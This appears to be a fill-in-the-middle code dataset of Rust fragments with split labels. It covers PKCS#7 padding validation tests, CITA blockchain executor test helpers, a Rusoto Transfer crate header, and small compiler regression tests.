pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
{ 1 }
|
conditional_block
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
|
use crate::errors::*;
pub fn run() -> Result<()> {
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
random_line_split
|
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
use crate::errors::*;
pub fn
|
() -> Result<()> {
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
run
|
identifier_name
|
challenge15.rs
|
use aes::{unpad_inplace, Aes128};
use crate::errors::*;
pub fn run() -> Result<()>
|
{
{
let mut message = b"ICE ICE BABY\x04\x04\x04\x04".to_vec();
unpad_inplace(&mut message, 16)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
compare_eq(false, b"ICE ICE BABY\x05\x05\x05\x05".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x01\x02\x03\x04".padding_valid())?;
compare_eq(false, b"ICE ICE BABY\x03\x03\x03".padding_valid())?;
{
let mut message = b"ICE ICE BABY\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C".to_vec();
unpad_inplace(&mut message, 12)?;
compare_eq(b"ICE ICE BABY".as_ref(), &message)?;
}
Ok(())
}
|
identifier_body
|
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock
|
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
{
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof= ?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
|
identifier_body
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
|
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
|
random_line_split
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn init_executor2(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else
|
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
{
tx.set_to(to.lower_hex());
}
|
conditional_block
|
helpers.rs
|
// Copyrighttape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate rustc_serialize;
extern crate tempdir;
use std::env;
use std::fs::File;
use std::io::Read;
use std::io::Write;
use std::path::Path;
use std::process::Command;
use std::sync::Arc;
use std::time::UNIX_EPOCH;
use self::rustc_serialize::hex::FromHex;
use self::tempdir::TempDir;
use crate::libexecutor::block::{BlockBody, ClosedBlock, OpenBlock};
use crate::libexecutor::command;
use crate::libexecutor::executor::Executor;
use crate::types::header::OpenHeader;
use crate::types::transaction::SignedTransaction;
use cita_crypto::PrivKey;
use cita_types::traits::LowerHex;
use cita_types::{Address, U256};
use cita_vm::{state::MemoryDB, state::State};
use crossbeam_channel::{Receiver, Sender};
use libproto::blockchain;
use util::AsMillis;
const SCRIPTS_DIR: &str = "../../scripts";
pub fn get_temp_state() -> State<MemoryDB> {
let db = Arc::new(MemoryDB::new(false));
State::new(db).unwrap()
}
pub fn solc(name: &str, source: &str) -> (Vec<u8>, Vec<u8>) {
// input and output of solc command
let output_dir = TempDir::new("solc_output").unwrap().into_path();
let contract_file = output_dir.join("contract.sol");
let deploy_code_file = output_dir.join([name, ".bin"].join(""));
let runtime_code_file = output_dir.join([name, ".bin-runtime"].join(""));
// prepare contract file
let mut file = File::create(contract_file.clone()).unwrap();
let mut content = String::new();
file.write_all(source.as_ref()).expect("failed to write");
// execute solc command
Command::new("solc")
.arg(contract_file.clone())
.arg("--bin")
.arg("--bin-runtime")
.arg("-o")
.arg(output_dir)
.output()
.expect("failed to execute solc");
// read deploy code
File::open(deploy_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let deploy_code = content.as_str().from_hex().unwrap();
// read runtime code
let mut content = String::new();
File::open(runtime_code_file)
.expect("failed to open deploy code file!")
.read_to_string(&mut content)
.expect("failed to read binary");
let runtime_code = content.from_hex().unwrap();
(deploy_code, runtime_code)
}
pub fn init_executor() -> Executor {
let (_fsm_req_sender, fsm_req_receiver) = crossbeam_channel::unbounded();
let (fsm_resp_sender, _fsm_resp_receiver) = crossbeam_channel::unbounded();
let (_command_req_sender, command_req_receiver) = crossbeam_channel::bounded(0);
let (command_resp_sender, _command_resp_receiver) = crossbeam_channel::bounded(0);
init_executor2(
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
)
}
pub fn
|
(
fsm_req_receiver: Receiver<OpenBlock>,
fsm_resp_sender: Sender<ClosedBlock>,
command_req_receiver: Receiver<command::Command>,
command_resp_sender: Sender<command::CommandResp>,
) -> Executor {
// FIXME temp dir should be removed automatically, but at present it is not
let tempdir = TempDir::new("init_executor").unwrap().into_path();
let genesis_path = Path::new(SCRIPTS_DIR).join("config_tool/genesis/genesis.json");
let mut data_path = tempdir.clone();
data_path.push("data");
env::set_var("DATA_PATH", data_path);
let executor = Executor::init(
genesis_path.to_str().unwrap(),
tempdir.to_str().unwrap().to_string(),
fsm_req_receiver,
fsm_resp_sender,
command_req_receiver,
command_resp_sender,
false,
);
executor
}
pub fn create_block(
executor: &Executor,
to: Address,
data: &Vec<u8>,
nonce: (u32, u32),
privkey: &PrivKey,
) -> OpenBlock {
let mut block = OpenBlock::default();
block.set_parent_hash(executor.get_current_hash());
block.set_timestamp(AsMillis::as_millis(&UNIX_EPOCH.elapsed().unwrap()));
block.set_number(executor.get_current_height() + 1);
// header.proof=?;
let mut body = BlockBody::default();
let mut txs = Vec::new();
for i in nonce.0..nonce.1 {
let mut tx = blockchain::Transaction::new();
if to == Address::from(0) {
tx.set_to(String::from(""));
} else {
tx.set_to(to.lower_hex());
}
tx.set_nonce(U256::from(i).lower_hex());
tx.set_data(data.clone());
tx.set_valid_until_block(100);
tx.set_quota(1844674);
let stx = tx.sign(*privkey);
let new_tx = SignedTransaction::create(&stx).unwrap();
txs.push(new_tx);
}
body.set_transactions(txs);
block.set_body(body);
block
}
pub fn generate_contract() -> Vec<u8> {
let source = r#"
pragma solidity ^0.4.8;
contract ConstructSol {
uint a;
event LogCreate(address contractAddr);
event A(uint);
function ConstructSol(){
LogCreate(this);
}
function set(uint _a) {
a = _a;
A(a);
}
function get() returns (uint) {
return a;
}
}
"#;
let (data, _) = solc("ConstructSol", source);
data
}
pub fn generate_block_header() -> OpenHeader {
OpenHeader::default()
}
pub fn generate_block_body() -> BlockBody {
let mut stx = SignedTransaction::default();
stx.data = vec![1; 200];
let transactions = vec![stx; 200];
BlockBody { transactions }
}
pub fn generate_default_block() -> OpenBlock {
let block_body = generate_block_body();
let block_header = generate_block_header();
OpenBlock {
body: block_body,
header: block_header,
}
}
|
init_executor2
|
identifier_name
|
lib.rs
|
// =================================================================
//
// * WARNING *
//
// This file is generated!
//
// Changes made to this file will be overwritten. If changes are
// required to the generated code, the service_crategen project
// must be updated to generate the changes.
//
// =================================================================
#![doc(
html_logo_url = "https://raw.githubusercontent.com/rusoto/rusoto/master/assets/logo-square.png"
)]
//! <p>Amazon Web Services Transfer Family is a fully managed service that enables the transfer of files over the File Transfer Protocol (FTP), File Transfer Protocol over SSL (FTPS), or Secure Shell (SSH) File Transfer Protocol (SFTP) directly into and out of Amazon Simple Storage Service (Amazon S3). Amazon Web Services helps you seamlessly migrate your file transfer workflows to Amazon Web Services Transfer Family by integrating with existing authentication systems, and providing DNS routing with Amazon Route 53 so nothing changes for your customers and partners, or their applications. With your data in Amazon S3, you can use it with Amazon Web Services services for processing, analytics, machine learning, and archiving. Getting started with Amazon Web Services Transfer Family is easy since there is no infrastructure to buy and set up.</p>
//!
//! If you're using the service, you're probably looking for [TransferClient](struct.TransferClient.html) and [Transfer](trait.Transfer.html).
|
mod generated;
pub use custom::*;
pub use generated::*;
|
mod custom;
|
random_line_split
|
issue-11552.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(unknown_features)]
#![feature(box_syntax)]
#[derive(Clone)]
enum
|
{
Atom(int),
Cell(Box<Noun>, Box<Noun>)
}
fn fas(n: &Noun) -> Noun
{
match n {
&Noun::Cell(box Noun::Atom(2), box Noun::Cell(ref a, _)) => (**a).clone(),
_ => panic!("Invalid fas pattern")
}
}
pub fn main() {
fas(&Noun::Cell(box Noun::Atom(2), box Noun::Cell(box Noun::Atom(2), box Noun::Atom(3))));
}
|
Noun
|
identifier_name
|
issue-11552.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(unknown_features)]
#![feature(box_syntax)]
|
Cell(Box<Noun>, Box<Noun>)
}
fn fas(n: &Noun) -> Noun
{
match n {
&Noun::Cell(box Noun::Atom(2), box Noun::Cell(ref a, _)) => (**a).clone(),
_ => panic!("Invalid fas pattern")
}
}
pub fn main() {
fas(&Noun::Cell(box Noun::Atom(2), box Noun::Cell(box Noun::Atom(2), box Noun::Atom(3))));
}
|
#[derive(Clone)]
enum Noun
{
Atom(int),
|
random_line_split
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
|
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn foo() -> (u32, u32) {
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
|
random_line_split
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn foo() -> (u32, u32)
|
{
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
identifier_body
|
|
target-feature-multiple.rs
|
// assembly-output: emit-asm
// needs-llvm-components: x86
// revisions: TWOFLAGS SINGLEFLAG
// compile-flags: --target=x86_64-unknown-linux-gnu
// [TWOFLAGS] compile-flags: -C target-feature=+rdrnd -C target-feature=+rdseed
// [SINGLEFLAG] compile-flags: -C target-feature=+rdrnd,+rdseed
// Target features set via flags aren't necessarily reflected in the IR, so the only way to test
// them is to build code that requires the features to be enabled to work.
//
// In this particular test if `rdrnd,rdseed` somehow didn't make it to LLVM, the instruction
// selection should crash.
//
// > LLVM ERROR: Cannot select: 0x7f00f400c010: i32,i32,ch = X86ISD::RDSEED 0x7f00f400bfa8:2
// > In function: foo
//
// See also src/test/codegen/target-feature-overrides.rs
#![feature(no_core, lang_items, link_llvm_intrinsics, abi_unadjusted)]
#![crate_type = "lib"]
#![no_core]
#[lang = "sized"]
trait Sized {}
#[lang = "copy"]
trait Copy {}
// Use of these requires target features to be enabled
extern "unadjusted" {
#[link_name = "llvm.x86.rdrand.32"]
fn x86_rdrand32_step() -> (u32, i32);
#[link_name = "llvm.x86.rdseed.32"]
fn x86_rdseed32_step() -> (u32, i32);
}
#[no_mangle]
pub unsafe fn
|
() -> (u32, u32) {
// CHECK-LABEL: foo:
// CHECK: rdrand
// CHECK: rdseed
(x86_rdrand32_step().0, x86_rdseed32_step().0)
}
|
foo
|
identifier_name
|
utils.rs
|
